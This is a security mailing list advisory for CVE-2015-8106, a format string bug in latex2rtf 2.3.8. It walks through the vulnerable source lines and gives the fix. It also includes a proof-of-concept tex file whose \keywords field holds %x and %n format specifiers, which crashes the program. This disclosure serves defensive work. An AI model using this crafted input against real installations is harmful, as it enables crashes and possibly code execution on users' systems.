[<prev] [next>] [day] [month] [year] [list]
Message-ID: <5649AD62.8040704@ropas.snu.ac.kr>
Date: Mon, 16 Nov 2015 19:18:10 +0900
From: 김종권 <jgkim@...as.snu.ac.kr>
To: oss-security@...ts.openwall.com
Cc: wslee@...as.snu.ac.kr
Subject: CVE-2015-8106 - latex2rtf v2.3.8 format string vulnerability
Dear List,
I am writing this to report a format string vulnerability in ubuntu
package latex2rtf. (2.3.8, which is the latest version).
Also I already have been assigned a CVE identifier from MITRE
"CVE-2015-8106", so I want to make public this vulnerability.
- Target Platform
Windows, Linux, OS X
- Target Version
2.3.8 (Latest Version)
- Vulnerability description
When the user runs latex2rtf with malicious crafted tex file, an
attacker can execute arbitrary code.
The function CmdKeywords processes the \keywords command in tex file.
The variable `keywords' in the function CmdKeywords may hold a malicious
input string, which can be used as a format argument of vsnprintf.
-- Step 1. (funct1.c 1789 line)
1789 char *keywords = getBraceParam();
For instance, the variable keywords will point to the string “MALICIOUS”
when a text line "\keywords{MALICIOUS}” exists in an input tex file.
-- Step 2. (funct1.c 1798 line)
1798 fprintRTF(keywords);
fprintfRTF() is called in line 1798, and the parameter is used as a
format string, which can be malicious, as we described in step 1.
-- Step 3. (main.c 873 line)
858 void fprintRTF(char *format, ...){
...
873 vsnprintf(buffer, 1024, format, apf);
...
The value of format, which may be malicious, is used as an argument of
vsnprintf in line 873, therefore arbitrary code can be executed.
-- Step 4. Our malicious input
"exploit.tex"
========================
\documentclass{article}
\begin{document}
\title{Exploitable}
\author{Jong-Gwon Kim}
\keywords{%x\%n\%n\%n}
\end{document}
=========================
Execute
==========================
~ $ latex2rtf -v
latex2rtf 2.3.8 r1240 (released June 16 2014)
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Prahl, Lehner, Granzer, Dorner, Polzer, Trisko, Schlatterbeck.
~ $ latex2rtf exploit.tex
aborted (core dumped)
==========================
-- Step 5. How to fix
(funct1.c 1798 line)
1798 fprintRTF(keywords); ===> fprintRTF("%s", keywords);
- How we found the vulnerability
We used a static analyzer, Sparrow[1], to find the format string bug.
Our analyzer reported an alarm in latex2rtf main.c 873 line, So we
looked for a latex2rtf source code and found the bug.
Sparrow is a state-of-the-art static analyzer that aims to verify the
absence of fatal bugs in C source. Sparrow is designed by Abstract
Interpretation and the analysis is sound in design. Sparrow adopts a
number of well-founded static analysis techniques[2,3] for scalability,
precision, and user convenience.
References
[1]: http://ropas.snu.ac.kr/sparrow/
[2]: Selective Context-Sensitivity Guided by Impact Pre-Analysis. Hakjoo
Oh, Wonchan Lee, Kihong Heo, Hongseok Yang, and Kwangkeun Yi. PLDI'14.
[3]: Design and Implementation of Sparse Global Analyses for C-like
Languages. Hakjoo Oh, Kihong Heo, Wonchan Lee, Woosuk Lee, and Kwangkeun
Yi. PLDI'12
Sincerely, Jong-Gwon Kim & Woosuk Lee
-----------------------------
Jong-Gwon Kim
Graduate student
ROPAS lab. (http://ropas.snu.ac.kr/)
ROSAEC center (http://rosaec.snu.ac.kr/)
Seoul National University
(tel) +82-2-880-1865
(email) jgkim@...as.snu.ac.kr
-----------------------------
-----------------------------
Woosuk Lee
Ph.D. candidate
ROPAS lab. (http://ropas.snu.ac.kr/)
ROSAEC center (http://rosaec.snu.ac.kr/)
Seoul National University
(tel) +82-2-880-1865
(email) wslee@...as.snu.ac.kr
-----------------------------
Powered by blists - more mailing lists
Please check out the
Open Source Software Security Wiki, which is counterpart to this
mailing list.
Confused about mailing lists and their use?
Read about mailing lists on Wikipedia
and check out these
guidelines on proper formatting of your messages.
